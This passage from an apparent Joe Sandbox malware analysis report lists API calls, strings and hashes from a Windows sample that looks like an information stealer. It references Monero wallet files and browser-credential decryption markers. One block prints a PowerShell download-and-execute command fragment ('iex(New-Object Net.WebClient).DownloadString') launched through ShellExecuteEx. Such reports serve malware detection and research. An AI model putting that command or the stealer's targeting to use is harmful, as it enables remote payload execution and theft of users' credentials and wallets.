                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 819fa3ff59ed1b743dcafa94248568032a0dc1ffb09dc55d9cc154805c5a416d
                          • Instruction ID: cc0c94a1dc0438db5f14bb3adbd8c4245d7f249c535b245b433eba1466e62156
                          • Opcode Fuzzy Hash: 819fa3ff59ed1b743dcafa94248568032a0dc1ffb09dc55d9cc154805c5a416d
                          • Instruction Fuzzy Hash: 92210A7190021CAFDB24DB54DC89FE9B7B8FB48700F04C5A8A649A6280DF716AC5CFD4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C076A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C076AB
                          • RegOpenKeyExA.ADVAPI32(80000002,006DBBD0,00000000,00020119,00000000), ref: 00C076DD
                          • RegQueryValueExA.ADVAPI32(00000000,006ED898,00000000,00000000,?,000000FF), ref: 00C076FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C07708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: bffd2435b2b9e08840c6eb8e9ac4c0066deb24a73ec70ce62bc43bfe3072503e
                          • Instruction ID: 3e28e23ae316744c89877441f5a5aedf4c50e1c350c638735667fcff27ab440c
                          • Opcode Fuzzy Hash: bffd2435b2b9e08840c6eb8e9ac4c0066deb24a73ec70ce62bc43bfe3072503e
                          • Instruction Fuzzy Hash: 17012CB5A04208BFDB04DBA5DC4DFA9BBB8EB48701F144169FA45A6290D670AA88CB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C0773B
                          • RegOpenKeyExA.ADVAPI32(80000002,006DBBD0,00000000,00020119,00C076B9), ref: 00C0775B
                          • RegQueryValueExA.ADVAPI32(00C076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C0777A
                          • RegCloseKey.ADVAPI32(00C076B9), ref: 00C07784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 964a1085f38bce65f87c72b9db0913f365abed6633183fb4c9149f25635eb660
                          • Instruction ID: b12104d7d3482191b88f1f39fb4e75b392cf4ecb6aeb881fb310e8f092a7cdd0
                          • Opcode Fuzzy Hash: 964a1085f38bce65f87c72b9db0913f365abed6633183fb4c9149f25635eb660
                          • Instruction Fuzzy Hash: 480144B5A4030CBFD714DBE5DC4EFAEBBB8EB44700F104169FA45A7281D6705644CB51
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                          • LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c120d4ffd09f59ff7e78a5d7b0c5e2d2a9f69a04767255e32f09cb8416b858dd
                          • Instruction ID: 86456ce75b87ce648d6986ee8ee1cbbefe57a8652207d8de031c8ca2f424d1ad
                          • Opcode Fuzzy Hash: c120d4ffd09f59ff7e78a5d7b0c5e2d2a9f69a04767255e32f09cb8416b858dd
                          • Instruction Fuzzy Hash: 9B31EB74A0020DEFDB14CF95D989BAE7BF5FF48350F108198E911A7290D774A985CFA1
                          APIs
                          • lstrcat.KERNEL32(?,006EDD60), ref: 00C047DB
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04801
                          • lstrcat.KERNEL32(?,?), ref: 00C04820
                          • lstrcat.KERNEL32(?,?), ref: 00C04834
                          • lstrcat.KERNEL32(?,006DB310), ref: 00C04847
                          • lstrcat.KERNEL32(?,?), ref: 00C0485B
                          • lstrcat.KERNEL32(?,006ED558), ref: 00C0486F
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08D90: GetFileAttributesA.KERNEL32(00000000,?,00BF1B54,?,?,00C1564C,?,?,00C10E1F), ref: 00C08D9F
                            • Part of subcall function 00C04570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C04580
                            • Part of subcall function 00C04570: RtlAllocateHeap.NTDLL(00000000), ref: 00C04587
                            • Part of subcall function 00C04570: wsprintfA.USER32 ref: 00C045A6
                            • Part of subcall function 00C04570: FindFirstFileA.KERNEL32(?,?), ref: 00C045BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: fdedcfad42e9e197cc6843a46c954ac3eac37a28933d692f6843b92ff04badc6
                          • Instruction ID: 3668b8c1e7c69617d1007c6337f9ea8db2b16e0044d689edb130706ea731da7f
                          • Opcode Fuzzy Hash: fdedcfad42e9e197cc6843a46c954ac3eac37a28933d692f6843b92ff04badc6
                          • Instruction Fuzzy Hash: 303162B290020CABCB14FBA0DC8AEE9777CAB58700F444599B395A60C1EE75D7CDDB91
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C02D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C02CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C02D04
                          • ')", xrefs: 00C02CB3
                          • <, xrefs: 00C02D39
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: ef0588c7e4876d0a7d91f90080964902bfff989e40b67762fdbe82da7891d7d6
                          • Instruction ID: a9db8b8188d3ff26d2b781a16d508eb71c5829602b90244fa49e74f146d7cc0c
                          • Opcode Fuzzy Hash: ef0588c7e4876d0a7d91f90080964902bfff989e40b67762fdbe82da7891d7d6
                          • Instruction Fuzzy Hash: 4F41DB71D103089ADB14FBA1C896FEDBB74AF10700F508129F156AA1D1EF746A8AEF91
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00BF9F41
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 6c8ac7ee0986a33675a5ffa6685a6406952682496f22a789117070893c626dcc
                          • Instruction ID: 60cc74bc403e3d9d9be1339d8eba9f88182dc59fddc32e567e68313276c61847
                          • Opcode Fuzzy Hash: 6c8ac7ee0986a33675a5ffa6685a6406952682496f22a789117070893c626dcc
                          • Instruction Fuzzy Hash: C6612E70A0024CDFDB28EFA4DC96FED77B5AF54300F008518FA095B191DB746A49DB52
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,006ED678,00000000,00020119,?), ref: 00C040F4
                          • RegQueryValueExA.ADVAPI32(?,006EDC10,00000000,00000000,00000000,000000FF), ref: 00C04118
                          • RegCloseKey.ADVAPI32(?), ref: 00C04122
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04147
                          • lstrcat.KERNEL32(?,006EDD90), ref: 00C0415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 2d060d7ab2d28808badfb96a4d5e2f4127ebb4f17db77d3bdb090b4ebe6f2cbc
                          • Instruction ID: fa5ba818e9d37c8542844c65488b089ab0cd80b041a9768e35970a8fcf938a91
                          • Opcode Fuzzy Hash: 2d060d7ab2d28808badfb96a4d5e2f4127ebb4f17db77d3bdb090b4ebe6f2cbc
                          • Instruction Fuzzy Hash: 9C41C6B690010CABDB14EBA0DC4AFFE777DAB88300F444958B76557181EA759BCCCB92
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00C0696C
                          • sscanf.NTDLL ref: 00C06999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C069B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C069C0
                          • ExitProcess.KERNEL32 ref: 00C069DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 04cfaae6f88d657eb27c72f52aeacfcad16b8d9e3e9ff13e4c999e7077b77d36
                          • Instruction ID: 93b4c2b1167e6fb87307256cbc91454f9f3199074249cb02dfa0bfa0bd0c2163
                          • Opcode Fuzzy Hash: 04cfaae6f88d657eb27c72f52aeacfcad16b8d9e3e9ff13e4c999e7077b77d36
                          • Instruction Fuzzy Hash: 9021EA75D0020CAFCF08EFE4D949AEEBBB5BF48300F04852AE416B3290EB345609CB65
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,006DB9D8,00000000,00020119,?), ref: 00C07E5E
                          • RegQueryValueExA.ADVAPI32(?,006ED6D8,00000000,00000000,000000FF,000000FF), ref: 00C07E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00C07E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 41a1419eda772c4951601d7755eb6032b83b8bce3f4bddd7094271bff771f701
                          • Instruction ID: d85c58c1da3df736aef1d4ff4d0875b0e6d999832a6bcfb382ea146bf1e64d53
                          • Opcode Fuzzy Hash: 41a1419eda772c4951601d7755eb6032b83b8bce3f4bddd7094271bff771f701
                          • Instruction Fuzzy Hash: 70118CB1A44209EFD704CB96DC4DFBBBBB8EB04B00F104269F615A72C0D7746844CBA1
                          APIs
                          • StrStrA.SHLWAPI(006ED9A0,?,?,?,00C0140C,?,006ED9A0,00000000), ref: 00C0926C
                          • lstrcpyn.KERNEL32(00E3AB88,006ED9A0,006ED9A0,?,00C0140C,?,006ED9A0), ref: 00C09290
                          • lstrlen.KERNEL32(?,?,00C0140C,?,006ED9A0), ref: 00C092A7
                          • wsprintfA.USER32 ref: 00C092C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: df7d62d654151e0f66bd3492fe645978d6e22ae62bc0f15b1e4748c582bfa3db
                          • Instruction ID: 21b3078f5eaefa2db5a18ebbab165314908eb7730e40ab959738ce71e10c3241
                          • Opcode Fuzzy Hash: df7d62d654151e0f66bd3492fe645978d6e22ae62bc0f15b1e4748c582bfa3db
                          • Instruction Fuzzy Hash: CC01087550020CFFCB04DFECC989EAE7BB9EB48350F188158F949AB241C631AA84DB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BF12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BF12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00BF12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: af8fed28c1f3815cd86fbaca29d2e8998a2af0d8461a7edc4601b35823d7e043
                          • Instruction ID: fee72a119753923c5a7e30afd2346fe8104cf6c1905cd0e2683d820fe1a120f6
                          • Opcode Fuzzy Hash: af8fed28c1f3815cd86fbaca29d2e8998a2af0d8461a7edc4601b35823d7e043
                          • Instruction Fuzzy Hash: 3E0136B5A4020CBFDB04DFD5DC4DFAEBBB8EB48701F008159FA45A7280D6719A458F51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 27037096911413673ea4a7b12d95475c7a138f3925195086ca7d72091be36381
                          • Instruction ID: 7dcd3b8aa23f85e9a7280de6e9142c66c69ddf31c8934f5ee4869de7c4522e62
                          • Opcode Fuzzy Hash: 27037096911413673ea4a7b12d95475c7a138f3925195086ca7d72091be36381
                          • Instruction Fuzzy Hash: EE41F5B110079C5EDB218B24CCC4FFBBBE8AF45704F1446E8E99A861C2D2719B45DF24
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C06663
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C06726
                          • ExitProcess.KERNEL32 ref: 00C06755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 7aa997f02b3685496abb3b313b2ea5d6e4cf345620d3923eb378516a1dc22f9d
                          • Instruction ID: b66fd2ac863cc8dec9ee1f528c6763a89a1b2e172fd027fdffaf4d3beb5591fe
                          • Opcode Fuzzy Hash: 7aa997f02b3685496abb3b313b2ea5d6e4cf345620d3923eb378516a1dc22f9d
                          • Instruction Fuzzy Hash: 0E314BB1901208AEDB14EB90DC86FDEBB78AF54300F404199F24A761D1DF746B88DF66
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C10E28,00000000,?), ref: 00C0882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08836
                          • wsprintfA.USER32 ref: 00C08850
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: cbad93e7dcea75281633c6f1256f3659c2df566fc56969564fa86eacb8e34ded
                          • Instruction ID: 7fcef86dcf2040b934344133c14c80243e6a2eb0d31ccc503f3c7f530b0569a2
                          • Opcode Fuzzy Hash: cbad93e7dcea75281633c6f1256f3659c2df566fc56969564fa86eacb8e34ded
                          • Instruction Fuzzy Hash: 6C212CB1A40208AFDB04DF99DD49FAEBBB8FB48701F144129F645B72C0C779A944CBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C0951E,00000000), ref: 00C08D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08D62
                          • wsprintfW.USER32 ref: 00C08D78
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 4ae990940de53b487a468bf31e24139e69fe2d42d2722cba4f6a464939a5efaa
                          • Instruction ID: 1f51e19e2fefa11b252a70a3315bda176cf49cbb5d5c763767e40251c33fb079
                          • Opcode Fuzzy Hash: 4ae990940de53b487a468bf31e24139e69fe2d42d2722cba4f6a464939a5efaa
                          • Instruction Fuzzy Hash: F0E08670A4020CFFD704DB95DC0EE597BB8EB04701F040064FD4997280D9715E449B52
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00BFA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00BFA6BC
